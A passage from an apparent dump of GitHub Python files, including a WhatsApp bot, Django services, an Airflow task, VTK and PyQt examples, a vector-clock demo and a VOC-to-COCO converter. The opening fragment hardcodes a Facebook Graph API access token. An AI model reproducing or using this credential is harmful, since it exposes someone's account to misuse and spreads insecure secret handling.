\"EAAUQM1QonnkBO5mIZB6fuJxBtgkBfFwIMjyZC24FY6MXR2aRCHDu5vIklr1Hz0moEeBZAcGDySBeUL2duPDIoRNYtXzi8reXpRymj4u0KjLsEhxPBFu2ufOIo3XnvKvxmvgvpyzJSHU5s2dTCuV8bHkhQNlgShEk6LOzZA5dlsVp3heRLTGGD7m10SYsgWDizdk7yPWJt2dzPZBobAiP9\"\n api_url = \"https://graph.facebook.com/v17.0/114784988391901/messages\"\n headers = {\"Content-Type\": \"application/json\", \"Authorization\": \"Bearer \" + token}\n response = requests.post(api_url, data = json.dumps(data), headers = headers)\n if response.status_code == 200:\n return True\n \n return False\n except Exception as exception:\n print(exception)\n return False","repo_name":"Fran1239/FazChatBot","sub_path":"whatsappservice.py","file_name":"whatsappservice.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33481984410","text":"class Package:\n def __init__(self, id, address, city, state, zipcode, deadline, weight):\n self.id = id\n self.address = address\n self.city = city\n self.state = state\n self.zipcode = zipcode\n self.deadline = deadline\n self.weight = weight\n\n def __str__(self):\n return \"%s, %s, %s, %s, %s, %s, %s\" % (self.id, self.address, self.city, self.state, self.zipcode, self.deadline, self.weight)\n","repo_name":"goldenaj/Andrew_Golden_C950_PA","sub_path":"Package.py","file_name":"Package.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22181170759","text":"import Augmentor\r\n\r\n# 确定原始图像存储路径以及掩码文件路径\r\nJPEG = Augmentor.Pipeline(\"Bijie-landslide-dataset\\landslide\\image\")\r\nJPEG.ground_truth(\"Bijie-landslide-dataset\\landslide\\mask\")\r\n\r\n# 图像旋转:按照概率0.8执行,最大左旋角10,最大右旋角\r\nJPEG.rotate(probability=0.8,max_left_rotation=10,max_right_rotation=10)\r\n\r\n# 图像左右互换:按照概率0.5执行\r\nJPEG.flip_left_right(probability=0.5)\r\n\r\n# 图像放大缩小:按照概率0.8执行,面积为原始图像的0.8倍\r\nJPEG.zoom_random(probability=0.8,percentage_area=0.8)\r\nJPEG.zoom(probability=0.3,min_factor=1.1,max_factor=1.6)\r\n\r\n# 透视变形-垂直方向形变:magnitude 取(0,1),指的是形变程度\r\nJPEG.skew_tilt(probability=0.7,magnitude=1)\r\n\r\n# 透视形变-斜四角形变形变:magnitude 取(0,1),指的是形变程度\r\nJPEG.skew_corner(probability=0.7,magnitude=1)\r\n\r\n# 弹性扭曲,类似区域扭曲的感觉\r\nJPEG.random_distortion(probability=1,grid_height=5,grid_width=16,magnitude=8)\r\n\r\n# 错位变化\r\nJPEG.shear(probability=1,max_shear_left=15,max_shear_right=15)\r\n\r\n# 随即区域擦除\r\nJPEG.random_erasing(probability=1,rectangle_area=0.5)\r\n\r\n# # 亮度\r\n# JPEG.random_brightness(probability=0.5,min_factor=0.3,max_factor=1.2)\r\n\r\n# 颜色\r\nJPEG.random_color(probability=1,min_factor=0,max_factor=1)\r\n\r\n# # 对比度\r\n# JPEG.random_contrast(probability=1,min_factor=0.7,max_factor=1.2)\r\n\r\n# 最终扩充的数据样本\r\nJPEG.sample(20)\r\nJPEG.process()\r\n","repo_name":"fxd98/other-PY","sub_path":"data_augment/Augmentor汇总.py","file_name":"Augmentor汇总.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73709486533","text":"from matches.models import (Outcome, MatchDayMetadata)\nfrom django.db.models import Count\nfrom teams.services.domain import (\n TeamRepresentation, init_team, NameToTeamStats, IdToTeamStats)\nfrom django.core.cache import cache\nfrom typing import List\n\nNAME_TO_TEAM_STATS = 'name_to_team_stats'\nID_TO_TEAM_STATS = 'id_to_team_stats'\nLEADERBOARD = 'leaderboard'\nCURRENT_MATCHDAY = 'current_matchday'\n\n# ---------------- Public API ----------------\n\n\ndef get_leaderboard() -> List[TeamRepresentation]:\n \"\"\"\n Returns a sorted list of all teams by points.\n \"\"\"\n return get_cached_value('leaderboard')\n\n\ndef get_teams_by_name_similarity(name: str) -> List[TeamRepresentation]:\n team_stats = get_cached_value(NAME_TO_TEAM_STATS)\n similar = {team_name: team_representation\n for team_name, team_representation\n in team_stats.items()\n if name in team_name}\n return calculate_leaderboard(similar)\n\n\ndef get_team(team_id: int) -> TeamRepresentation:\n team_stats = get_cached_value(ID_TO_TEAM_STATS)\n return team_stats[team_id]\n\n\ndef get_cached_value(key: str):\n value = cache.get(key)\n if value is None:\n cache_contents = reload_cache()\n return cache_contents[key]\n\n return value\n\n\ndef reload_cache() -> dict:\n name_to_team_stats = build_name_to_team_stats(get_all_outcomes())\n leaderboard = calculate_leaderboard(name_to_team_stats)\n add_rank_to_team_stats(leaderboard)\n id_to_team_stats = build_id_to_team_stats(name_to_team_stats)\n cache_contents = {\n NAME_TO_TEAM_STATS: name_to_team_stats,\n ID_TO_TEAM_STATS: id_to_team_stats,\n LEADERBOARD: leaderboard,\n CURRENT_MATCHDAY: get_matchday_metadata()\n }\n\n cache.set_many(cache_contents, 300)\n\n return cache_contents\n# ---------------- Private Helpers ----------------\n\n\ndef get_all_outcomes():\n \"\"\"\n Returns an aggregate of the wins, losses and draws \n of each team in the database.\n \"\"\"\n return Outcome.objects.values(\n 'team__team_name',\n 'team_id',\n 'team__team_icon_url',\n 'outcome_type'\n ).annotate(outcome_type_count=Count('outcome_type'))\n\n\ndef build_name_to_team_stats(outcomes) -> NameToTeamStats:\n \"\"\"\n Builds structured classes out of a database aggregate and stores them\n in a team_name -> TeamRepresentation dictionary.\n \"\"\"\n team_performances: NameToTeamStats = {}\n for outcome in outcomes:\n team_name = outcome['team__team_name']\n team_icon_url = outcome['team__team_icon_url']\n team_performance = team_performances.get(\n team_name, init_team(outcome['team_id'], team_name, team_icon_url))\n setattr(team_performance,\n outcome['outcome_type'], outcome['outcome_type_count'])\n team_performances[team_name] = team_performance\n\n calculate_and_add_points(team_performances)\n\n return team_performances\n\n\ndef build_id_to_team_stats(stats: NameToTeamStats) -> IdToTeamStats:\n \"\"\"\n Builds a team_id -> TeamRepresentation dictionary from a\n team_name -> TeamRepresentation dictionary.\n \"\"\"\n id_to_representation_dict = {}\n for team_representation in stats.values():\n id_to_representation_dict[team_representation.id] = team_representation\n return id_to_representation_dict\n\n\ndef calculate_leaderboard(\n teams_stats: NameToTeamStats\n) -> List[TeamRepresentation]:\n \"\"\"\n Sorts teams by points.\n \"\"\"\n return sorted(\n teams_stats.values(),\n key=lambda tp: tp.points,\n reverse=True)\n\n\ndef calculate_and_add_points(team_performances: NameToTeamStats):\n \"\"\"\n Mutates each team representation by calculating the\n points based on the number of wins raws the team has.\n \"\"\"\n for team_name, team_performance in team_performances.items():\n points = team_performance.win * 3 + team_performance.draw\n team_performance.points = points\n\n\ndef add_rank_to_team_stats(leaderboard: List[TeamRepresentation]):\n \"\"\"\n Mutates each team representation by calculating the\n rank based on the order of the leaderboard.\n \"\"\"\n for i, team_representation in enumerate(leaderboard):\n team_representation.rank = i + 1\n\n\ndef get_matchday_metadata():\n return MatchDayMetadata.objects.order_by('-matchday')[0]\n","repo_name":"ZeppelinCode/football_stats_django","sub_path":"football_stats/teams/services/team_service.py","file_name":"team_service.py","file_ext":"py","file_size_in_byte":4314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31992117322","text":"from django.db import models\nfrom core.models import TimeStampedModel, Extensions\nfrom django.contrib.auth import get_user_model\nfrom user_profile.models import Address\nfrom products.models import Product\n\n\nUserModel = get_user_model()\n\n\nclass Order(Extensions):\n PENDING_STATE = \"p\"\n COMPLETED_STATE = \"c\"\n\n ORDER_CHOICES = ((PENDING_STATE, \"pending\"), (COMPLETED_STATE, \"completed\"))\n\n buyer = models.ForeignKey(UserModel, related_name=\"order\", on_delete=models.CASCADE)\n order_number = models.CharField(max_length=250, blank=True, null=True)\n status = models.CharField(\n max_length=1, choices=ORDER_CHOICES, default=PENDING_STATE\n )\n is_paid = models.BooleanField(default=False)\n address = models.ForeignKey(\n Address, related_name=\"order_address\", on_delete=models.CASCADE\n )\n\n @staticmethod\n def create_order(buyer, order_number, address, is_paid=False):\n order = Order()\n order.buyer = buyer\n order.order_number = order_number\n order.address = address\n order.is_paid = is_paid\n order.save()\n return order\n\n\nclass OrderItem(TimeStampedModel):\n order = models.ForeignKey(\n Order, related_name=\"order_items\", on_delete=models.CASCADE\n )\n product = models.ForeignKey(\n Product, related_name=\"product_order\", on_delete=models.CASCADE\n )\n quantity = models.IntegerField()\n total = models.DecimalField(max_digits=10, decimal_places=2)\n\n @staticmethod\n def create_order_item(order, product, quantity, total):\n order_item = OrderItem()\n order_item.order = order\n order_item.product = product\n order_item.quantity = quantity\n order_item.total = total\n order_item.save()\n return order_item\n","repo_name":"thomas545/ecommerce_api","sub_path":"order/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","stars":214,"dataset":"github-code","pt":"44"} +{"seq_id":"1779116016","text":"import logging\n\nfrom airflow.decorators import task\nfrom airflow.operators.python import get_current_context\n\nfrom influx.loaders.base_loader import BaseLoader\nfrom influx.utils.data_lakes.data_lake import DataLake\nfrom influx.utils.factory import Factory\n\n\n@task\ndef load(transform_key, prefix=None, params=None):\n\n context = get_current_context()\n\n logging.info(\n f\"Executing {context['task'].task_id} task \"\n f\"of DAG {context['dag'].dag_id} with run Id of {context['run_id']} \"\n f\"and logical date of {context['logical_date']}\"\n )\n\n loader = Factory.create_subclass(\n BaseLoader,\n prefix=prefix if prefix else context[\"dag\"].dag_id,\n **(params if params else context[\"params\"]),\n )\n\n logging.info(f\"{loader.__class__.__name__} created for {context['task'].task_id} task\")\n\n data_lake = DataLake()\n transform_values = data_lake.get(transform_key)\n loader.load(transform_values)\n\n logging.info(f\"{loader.__class__.__name__} has completed loading\")\n","repo_name":"petersmithca/garmin-airflow-influxdb","sub_path":"influx/tasks/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74256671492","text":"from django.urls import path\nfrom products import views\n\nurlpatterns = [\n path(\"\",views.product_list_create_view,name='product-list'),\n path(\"/\",views.product_detail_view,name='product-detail'),\n path(\"/update/\",views.ProductUpdateAPIView.as_view(),name='product-edit'),\n path(\"/delete/\",views.ProductDeleteAPIView.as_view()),\n path(\"product_m\",views.ProductMixinView.as_view()),\n path(\"product_m//\",views.ProductMixinView.as_view()),\n]\n","repo_name":"ankitbridgefix/freecode","sub_path":"backend/cfehome/products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24200790387","text":"\n\"\"\"\nExample of plotting ellipsoids (useful for visualising tensors) with pyvisi \n\"\"\"\n\nimport vtk\n\n# reverse the order of the colourmap (looks better)\nlut = vtk.vtkLookupTable()\nrefLut = vtk.vtkLookupTable()\nlut.Build()\nrefLut.Build()\nfor i in range(256):\n lut.SetTableValue(i, refLut.GetTableValue(255-i))\n\n# set up the renderer\nren = vtk.vtkRenderer()\nrenWin = vtk.vtkRenderWindow()\nrenWin.AddRenderer(ren)\nrenWin.SetSize(640,480)\nren.SetBackground(1,1,1) # white\n\n# load a vtk file as input\nreader = vtk.vtkXMLUnstructuredGridReader()\nreader.SetFileName(\"stress22.vtk\")\nreader.Update()\n\n# grab the grid of the data\ngrid = reader.GetOutput()\n\n# convert the cell data to point data\nc2p = vtk.vtkCellDataToPointData()\nc2p.SetInput(grid)\n\n# now extract the tensor components\nextract = vtk.vtkExtractTensorComponents()\nextract.SetInput(c2p.GetOutput())\nextract.SetScalarModeToEffectiveStress()\nextract.ExtractScalarsOn()\nextract.PassTensorsToOutputOn()\nextract.ScalarIsEffectiveStress()\n\nextractGrid = extract.GetOutput()\nextractGrid.Update()\nextractScalarRange = extractGrid.GetPointData().GetScalars().GetRange()\n\n# make a sphere source for the glyphs\nsphere = vtk.vtkSphereSource()\nsphere.SetThetaResolution(6)\nsphere.SetPhiResolution(6)\nsphere.SetRadius(0.5)\n\n# make tensor glyphs\nglyph = vtk.vtkTensorGlyph()\nglyph.SetSource(sphere.GetOutput())\nglyph.SetInput(extractGrid)\nglyph.SetColorModeToScalars()\nglyph.ScalingOn()\nglyph.SetMaxScaleFactor(5.0)\nglyph.SetScaleFactor(1.0)\nglyph.ClampScalingOn()\n\n# make a stripper for faster rendering\nstripper = vtk.vtkStripper()\nstripper.SetInput(glyph.GetOutput())\n\n# make the normals of the data\nnormals = vtk.vtkPolyDataNormals()\nnormals.SetInput(stripper.GetOutput())\n\n# make the mapper for the data\nmapper = vtk.vtkPolyDataMapper()\nmapper.SetInput(normals.GetOutput())\nmapper.SetLookupTable(lut)\nmapper.SetScalarRange(extractScalarRange)\n\n# make the actor\nactor = vtk.vtkActor()\nactor.SetMapper(mapper)\n\n# add the actor to be rendered\nren.AddActor(actor)\n\n# set up text properties\ntextProp = vtk.vtkTextProperty()\ntextProp.SetFontFamilyToArial()\ntextProp.BoldOff()\ntextProp.ItalicOff()\ntextProp.ShadowOff()\ntextProp.SetColor(0.0, 0.0, 0.0)\n\n# make a title\ntitle = vtk.vtkTextMapper()\ntitle.SetInput(\"Example ellipsoid plot\")\n\n# make the title text use the text properties\ntitleProp = title.GetTextProperty()\ntitleProp.ShallowCopy(textProp)\ntitleProp.SetJustificationToCentered()\ntitleProp.SetVerticalJustificationToTop()\ntitleProp.SetFontSize(20)\ntitleProp.BoldOn()\n\n# make the actor for the title\ntitleActor = vtk.vtkTextActor()\ntitleActor.SetMapper(title)\ntitleActor.GetPositionCoordinate().SetCoordinateSystemToNormalizedDisplay()\ntitleActor.GetPositionCoordinate().SetValue(0.5, 0.95)\n\nren.AddActor(titleActor)\n\n# add a scalar bar\nscalarBar = vtk.vtkScalarBarActor()\nscalarBar.SetLookupTable(lut)\nscalarBar.SetWidth(0.1)\nscalarBar.SetHeight(0.8)\nscalarBar.SetPosition(0.9, 0.15)\n\n# set up the label text properties \nscalarBarTextProp = scalarBar.GetLabelTextProperty()\nscalarBarTextProp.ShallowCopy(textProp)\nscalarBarTextProp.SetFontSize(10)\n\nren.AddActor(scalarBar)\n\n# set up stuff for interactive viewing\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\n\niren.Initialize()\nrenWin.Render()\niren.Start()\n\n# the WindowToImageFilter is what one uses to save the window to an \n# image file\nwin2img = vtk.vtkWindowToImageFilter()\nwin2img.SetInput(renWin)\n\n# set up the PNGWriter as we're saving to png\nwriter = vtk.vtkPNGWriter()\nwriter.SetFileName(\"ellipsoidPlot.png\")\nwriter.SetInput(win2img.GetOutput())\nwriter.Write()\n\n# vim: expandtab shiftwidth=4:\n\n","repo_name":"paultcochrane/pyvisi","sub_path":"examples/renderers/vtk/ellipsoidPlot.py","file_name":"ellipsoidPlot.py","file_ext":"py","file_size_in_byte":3626,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"33921175502","text":"from PyQt6 import uic, QtWidgets\nfrom Form import Ui_Dialog\nfrom PyQt6.QtWidgets import QPushButton\nfrom TicTacToe import TicTacToe\nfrom Player import Player\nimport sys\n\nForm, Window = uic.loadUiType(\"form.ui\")\n\n\nclass Ui(QtWidgets.QDialog, Form):\n def __init__(self):\n super(Ui, self).__init__()\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n self.initUI()\n\n def initUI(self):\n for btn in self.ui.groupBox.findChildren(QPushButton):\n btn.clicked.connect(self.buttonPresed)\n\n def buttonPresed(self):\n self.sender().setEnabled(False)\n btn = self.sender().objectName()\n temp = str(int(btn.split('_')[1]) - 1)\n s = '0' + temp if len(temp) == 1 else temp\n figure = game.add_position(int(s[0]), int(s[1]), player1)\n self.sender().setText(figure[0])\n self.end(figure[1])\n if type(figure[1]) is not tuple:\n self.draw()\n\n def draw(self):\n n, m = game.opponent_move()\n temp = game.add_position(n, m, player2)\n s = str(int(str(n) + str(m)) + 1)\n for pqbutton in self.ui.groupBox.findChildren(QPushButton):\n if pqbutton.objectName() == 'pushButton_' + s:\n pqbutton.setText(temp[0])\n pqbutton.setEnabled(False)\n self.end(temp[1])\n\n def end(self, res):\n if res == 'Ничья':\n return print(res)\n if res != 0:\n for i in range(len(res[1])):\n temp = str(int(str(res[1][i][0]) + str(res[1][i][1])) + 1)\n res[1][i] = 'pushButton_' + temp\n for pqbutton in self.ui.groupBox.findChildren(QPushButton):\n pqbutton.setEnabled(False)\n if pqbutton.objectName() in res[1]:\n font = pqbutton.font()\n font.setBold(True)\n font.setItalic(True)\n pqbutton.setFont(font)\n print(res[0])\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n w = Ui()\n w.show()\n player1 = Player('human', 'X')\n player2 = Player('computer', 'O')\n game = TicTacToe('hard', player1, player2)\n sys.exit(app.exec())\n","repo_name":"MrKykypy3ka/Y_lab","sub_path":"Week 2/Game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"856448620","text":"from multiprocessing import Process, Pipe\n\ndef calc_recv_timestamp(recv_time_stamp, counter):\n #Take max of recieved and current value for each process\n result = [0 for i in range(len(counter))]\n for i in range(len(counter)):\n result[i] = max(recv_time_stamp[i], counter[i])\n return result\n\ndef event(pid, counter):\n # Increase counter of current pid\n counter[pid] += 1\n return counter\n\ndef send_message(pipe, pid, counter):\n # Increase counter of current pid and send counter\n counter[pid] += 1\n pipe.send(('Empty shell', counter))\n return counter\n\ndef recv_message(pipe, pid, counter):\n # increase counter of current pid, receive counter from other\n # process and call function to recalculate counter\n counter[pid] += 1\n message, timestamp = pipe.recv()\n counter = calc_recv_timestamp(timestamp, counter)\n return counter\n\ndef process_one(pipe12):\n pid = 0\n counter = [0,0,0]\n counter = send_message(pipe12, pid, counter)\n counter = send_message(pipe12, pid, counter)\n counter = event(pid, counter)\n counter = recv_message(pipe12, pid, counter)\n counter = event(pid, counter)\n counter = event(pid, counter)\n counter = recv_message(pipe12, pid, counter)\n\n print(\"Process\",str(pid), \":\", counter)\n\ndef process_two(pipe21, pipe23):\n pid = 1\n counter = [0,0,0]\n counter = recv_message(pipe21, pid, counter)\n counter = recv_message(pipe21, pid, counter)\n counter = send_message(pipe21, pid, counter)\n counter = recv_message(pipe23, pid, counter)\n counter = event(pid, counter)\n counter = send_message(pipe21, pid, counter)\n counter = send_message(pipe23, pid, counter)\n counter = send_message(pipe23, pid, counter)\n\n print(\"Process\", str(pid), \":\", counter)\n\ndef process_three(pipe32):\n pid = 2\n counter = [0,0,0]\n counter = send_message(pipe32, pid, counter)\n counter = recv_message(pipe32, pid, counter)\n counter = event(pid, counter)\n counter = recv_message(pipe32, pid, counter)\n\n print(\"Process\", str(pid), \":\", counter)\n\nif __name__ == '__main__':\n oneandtwo, twoandone = Pipe()\n twoandthree, threeandtwo = Pipe()\n\n process1 = Process(target=process_one,\n args=(oneandtwo,))\n process2 = Process(target=process_two,\n args=(twoandone, twoandthree))\n process3 = Process(target=process_three,\n args=(threeandtwo,))\n\n process1.start()\n process2.start()\n process3.start()\n\n process1.join()\n process2.join()\n process3.join()","repo_name":"safinsaf/vector_clock","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28995599899","text":"import xml.etree.ElementTree as ET\nimport os\nimport json\nfrom datetime import datetime\nimport sys\nimport argparse\n\ncoco = dict()\ncoco['images'] = []\ncoco['type'] = 'instances'\ncoco['annotations'] = []\ncoco['categories'] = []\n\ncategory_set = dict()\nimage_set = set()\n\ncategory_item_id = -1\nimage_id = 000000\nannotation_id = 0\n\n\ndef addCatItem(name):\n global category_item_id\n category_item = dict()\n category_item['supercategory'] = 'none'\n category_item_id += 1\n category_item['id'] = category_item_id\n category_item['name'] = name\n coco['categories'].append(category_item)\n category_set[name] = category_item_id\n return category_item_id\n\n\ndef addImgItem(file_name, size):\n global image_id\n if file_name is None:\n raise Exception('Could not find filename tag in xml file.')\n if size['width'] is None:\n raise Exception('Could not find width tag in xml file.')\n if size['height'] is None:\n raise Exception('Could not find height tag in xml file.')\n image_id += 1\n image_item = dict()\n image_item['id'] = image_id\n image_item['file_name'] = file_name\n image_item['width'] = size['width']\n image_item['height'] = size['height']\n image_item['license'] = None\n image_item['flickr_url'] = None\n image_item['coco_url'] = None\n image_item['date_captured'] = str(datetime.today())\n coco['images'].append(image_item)\n image_set.add(file_name)\n return image_id\n\n\ndef addAnnoItem(object_name, image_id, category_id, bbox):\n global annotation_id\n annotation_item = dict()\n annotation_item['segmentation'] = []\n seg = []\n # bbox[] is x,y,w,h\n # left_top\n seg.append(bbox[0])\n seg.append(bbox[1])\n # left_bottom\n seg.append(bbox[0])\n seg.append(bbox[1] + bbox[3])\n # right_bottom\n seg.append(bbox[0] + bbox[2])\n seg.append(bbox[1] + bbox[3])\n # right_top\n seg.append(bbox[0] + bbox[2])\n seg.append(bbox[1])\n\n annotation_item['segmentation'].append(seg)\n\n annotation_item['area'] = bbox[2] * bbox[3]\n annotation_item['iscrowd'] = 0\n annotation_item['ignore'] = 0\n annotation_item['image_id'] = image_id\n annotation_item['bbox'] = bbox\n annotation_item['category_id'] = category_id\n annotation_id += 1\n annotation_item['id'] = annotation_id\n coco['annotations'].append(annotation_item)\n\n\ndef read_image_ids(image_sets_file):\n ids = []\n with open(image_sets_file, 'r') as f:\n for line in f.readlines():\n ids.append(line.strip())\n return ids\n\n\ndef parseXmlFilse(data_dir, json_save_path, split='train'):\n assert os.path.exists(data_dir), \"data path:{} does not exist\".format(data_dir)\n labelfile = split + \".txt\"\n image_sets_file = os.path.join(data_dir, \"ImageSets\", \"Main\", labelfile)\n xml_files_list = []\n if os.path.isfile(image_sets_file):\n ids = read_image_ids(image_sets_file)\n xml_files_list = [os.path.join(data_dir, \"Annotations\", f\"{i}.xml\") for i in ids]\n elif os.path.isdir(data_dir):\n # 修改此处xml的路径即可\n # xml_dir = os.path.join(data_dir,\"labels/voc\")\n xml_dir = data_dir\n xml_list = os.listdir(xml_dir)\n xml_files_list = [os.path.join(xml_dir, i) for i in xml_list]\n\n for xml_file in xml_files_list:\n if not xml_file.endswith('.xml'):\n continue\n\n tree = ET.parse(xml_file)\n root = tree.getroot()\n\n # 初始化\n size = dict()\n size['width'] = None\n size['height'] = None\n\n if root.tag != 'annotation':\n raise Exception('pascal voc xml root element should be annotation, rather than {}'.format(root.tag))\n\n # 提取图片名字\n file_name = root.findtext('filename')\n assert file_name is not None, \"filename is not in the file\"\n\n # 提取图片 size {width,height,depth}\n size_info = root.findall('size')\n assert size_info is not None, \"size is not in the file\"\n for subelem in size_info[0]:\n size[subelem.tag] = int(subelem.text)\n\n if file_name is not None and size['width'] is not None and file_name not in image_set:\n # 添加coco['image'],返回当前图片ID\n current_image_id = addImgItem(file_name, size)\n print('add image with name: {}\\tand\\tsize: {}'.format(file_name, size))\n elif file_name in image_set:\n raise Exception('file_name duplicated')\n else:\n raise Exception(\"file name:{}\\t size:{}\".format(file_name, size))\n\n # 提取一张图片内所有目标object标注信息\n object_info = root.findall('object')\n if len(object_info) == 0:\n continue\n # 遍历每个目标的标注信息\n for object in object_info:\n # 提取目标名字\n object_name = object.findtext('name')\n if object_name not in category_set:\n # 创建类别索引\n current_category_id = addCatItem(object_name)\n else:\n current_category_id = category_set[object_name]\n\n # 初始化标签列表\n bndbox = dict()\n bndbox['xmin'] = None\n bndbox['xmax'] = None\n bndbox['ymin'] = None\n bndbox['ymax'] = None\n # 提取box:[xmin,ymin,xmax,ymax]\n bndbox_info = object.findall('bndbox')\n for box in bndbox_info[0]:\n bndbox[box.tag] = int(box.text)\n\n if bndbox['xmin'] is not None:\n if object_name is None:\n raise Exception('xml structure broken at bndbox tag')\n if current_image_id is None:\n raise Exception('xml structure broken at bndbox tag')\n if current_category_id is None:\n raise Exception('xml structure broken at bndbox tag')\n bbox = []\n # x\n bbox.append(bndbox['xmin'])\n # y\n bbox.append(bndbox['ymin'])\n # w\n bbox.append(bndbox['xmax'] - bndbox['xmin'])\n # h\n bbox.append(bndbox['ymax'] - bndbox['ymin'])\n print('add annotation with object_name:{}\\timage_id:{}\\tcat_id:{}\\tbbox:{}'.format(object_name,\n current_image_id,\n current_category_id,\n bbox))\n addAnnoItem(object_name, current_image_id, current_category_id, bbox)\n\n json_parent_dir = os.path.dirname(json_save_path)\n if not os.path.exists(json_parent_dir):\n os.makedirs(json_parent_dir)\n json.dump(coco, open(json_save_path, 'w'))\n print(\"class nums:{}\".format(len(coco['categories'])))\n print(\"image nums:{}\".format(len(coco['images'])))\n print(\"bbox nums:{}\".format(len(coco['annotations'])))\n\n\nif __name__ == '__main__':\n \"\"\"\n 脚本说明:\n 本脚本用于将VOC��式的标注文件.xml转换为coco格式的标注文件.json\n 参数说明:\n voc_data_dir:两种格式\n 1.voc2012文件夹的路径,会自动找到voc2012/imageSets/Main/xx.txt\n 2.xml标签文件存放的文件夹\n json_save_path:json文件输出的文件夹\n split:主要用于voc2012查找xx.txt,如train.txt.如果用格式2,则不会用到该参数\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('-d', '--voc-dir', type=str, default='data/label/voc', help='voc path')\n parser.add_argument('-s', '--save-path', type=str, default='./data/convert/coco/train.json', help='json save path')\n parser.add_argument('-t', '--type', type=str, default='train', help='only use in voc2012/2007')\n opt = parser.parse_args()\n if len(sys.argv) > 1:\n print(opt)\n parseXmlFilse(opt.voc_dir, opt.save_path, opt.type)\n else:\n # voc_data_dir = r'D:\\dataset\\VOC2012\\VOCdevkit\\VOC2012'\n voc_data_dir = './data/labels/voc'\n json_save_path = './data/convert/coco/train.json'\n split = 'train'\n parseXmlFilse(data_dir=voc_data_dir, json_save_path=json_save_path, split=split)\n","repo_name":"KKKSQJ/DeepLearning","sub_path":"others/label_convert/voc2coco.py","file_name":"voc2coco.py","file_ext":"py","file_size_in_byte":8362,"program_lang":"python","lang":"en","doc_type":"code","stars":235,"dataset":"github-code","pt":"44"} +{"seq_id":"8524482009","text":"from flask import json\nfrom src.models.user import User\nfrom src.messages.success import success_msg\n\nBASE_URL = '/api/v1'\nCHARSET = 'utf-8'\n\n\nclass TestLandingPage:\n def test_base_url_successful(\n self,\n client,\n ):\n response = client.get('/')\n json_response = json.loads(response.data.decode(CHARSET))\n assert response.status_code == 200\n assert json_response['message'] == success_msg['landing_page']\n assert json_response['status'] == 'success'\n","repo_name":"nzediegwu1/taskmanager-api","sub_path":"tests/endpoints/test_landing_page.py","file_name":"test_landing_page.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5523321458","text":"\"\"\"\nO nosso cliente solicitou uma tabela para armazenar os livros que são comercializados pela\nempresa. A solicitação é somente para livros e não há a necessidade de realizar busca em\noutras tabelas. Hoje há um funcionário de vendas que tem uma tabela do Excel para guardar\nesses registros, mas as buscas estão ficando complexas. Decidiu-se então criar um banco de\ndados separado para esse funcionário.\nApós a criação da tabela, deveremos entregar algumas queries prontas para que sejam\nenviadas para o programador. As queries são as seguintes:\n1 – Trazer todos os dados.\n2 – Trazer o nome do livro e o nome da editora\n3 – Trazer o nome do livro e a UF dos livros publicados por autores do sexo masculino.\n4 - Trazer o nome do livro e o número de páginas dos livros publicados por autores do sexo\nfeminino.\n5 – Trazer os valores dos livros das editoras de São Paulo.\n6 – Trazer os dados dos autores do sexo masculino que tiveram livros publicados por São\nPaulo ou Rio de Janeiro (Questão Desafio).\n\nBanco:\tLIVRARIA\nTabela:\tLIVROS\nAtributos:\nNOME DO LIVRO\nNOME DO AUTOR\nSEXO DO AUTOR\nNUMERO DE PÁGINAS\nNOME DA EDITORA\nVALOR DO LIVRO\nESTADO (UF) DA EDITORA\nANO PUBLICACAO\n\"\"\"\nfrom tkinter import *\n\nbook = None\ngender = None\npages_number = None\neditor_name = None\nbook_value = None\neditor_uf = None\nyear_publication = None\nautor_name = None\nbook_store = []\n\n\ndef run():\n global book, gender, editor_name, editor_uf, book_store, autor_name\n autor_name = input(\"author's name: \")\n book = {autor_name: input(\"Book : \")}\n gender = {\"Gender\": input(\"Mas (M) or Fam (F): \")}\n editor_name = {\"Editor name\": input(\"Editorś name: \")}\n editor_uf = {\"Editor UF:\": input(\"Editor's UF: \")}\n\n read_pages()\n read_bookvalue()\n read_year_publication()\n\n store = [book, gender, pages_number, editor_name, book_value, editor_uf, year_publication]\n book_store.extend(store)\n\n again()\n\n\ndef read_pages():\n global pages_number\n try:\n pages_number = {\"Number of pages\": int(input(\"Input Number of pages: \"))}\n return pages_number\n except ValueError:\n print(\"Please, Input Only Numbers: \")\n read_pages()\n\n\ndef read_bookvalue():\n global book_value\n try:\n book_value = {\"Book Value\": int(input(\"Book Value: \"))}\n return book_value\n except ValueError:\n print(\"Please, Input Only Numbers: \")\n read_bookvalue()\n\n\ndef read_year_publication():\n global year_publication\n try:\n year_publication = {\"Year of Publication\": int(input(\"Year of Publication: \"))}\n return year_publication\n except ValueError:\n print(\"Please, Input Only Numbers: \")\n read_bookvalue()\n\n\ndef again():\n yes = \"yes\"\n no = 'no'\n res = input(\"do you want to do it again? \")\n if res == yes:\n run()\n else:\n print(\"Good Bye\")\n 